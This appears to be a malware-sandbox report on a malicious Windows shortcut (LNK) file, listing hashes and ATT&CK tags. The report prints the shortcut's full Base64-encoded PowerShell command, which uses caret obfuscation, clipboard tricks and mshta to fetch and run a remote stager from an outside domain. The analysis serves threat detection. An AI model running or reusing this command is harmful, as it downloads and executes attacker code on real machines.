Malicious
Malicious

b5fbcce121ee4e0b0a9825875b4cedbf

LNK File
|
MD5: b5fbcce121ee4e0b0a9825875b4cedbf
|
Size: 2.75 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b5fbcce121ee4e0b0a9825875b4cedbf
Sha1
cb82ae80067702e47b5a3a858ba1ae6d164138a3
Sha256
79d3b29e267a7a41068c7ebea0bd4cfe9e16dc0cc03a034c8fadbc4426bfbbf7
Sha384
6eb1645df5ad32f2d20a41429f06c1f684f02c95af74e2a356b7759822979f367b4599d71708c2438d50c5e0ba8c4a1e
Sha512
c27cac3444345c3f71828a3751becdfc08e255bb116a0a371ce2028d72eda301187057bb4aca3fe0c63f887d4fda2ed57b82de48a9b233b4543ff39b10f65e6c
SSDeep
24:8Ayw/BHYVKVWO+/CWuO9xkz4Xxa5gmYXsrsysh6FtmVdd79dsHqThOr:8y5aS6kUXSgmYcQVh6FtmVdJ91Ir
TLSH
9A51F2280AF101EAF673D7B99BF573B24966F7968D259ABC008063414722510B863E3A
File Structure
b5fbcce121ee4e0b0a9825875b4cedbf
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="
b5fbcce121ee4e0b0a9825875b4cedbf (2.75 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙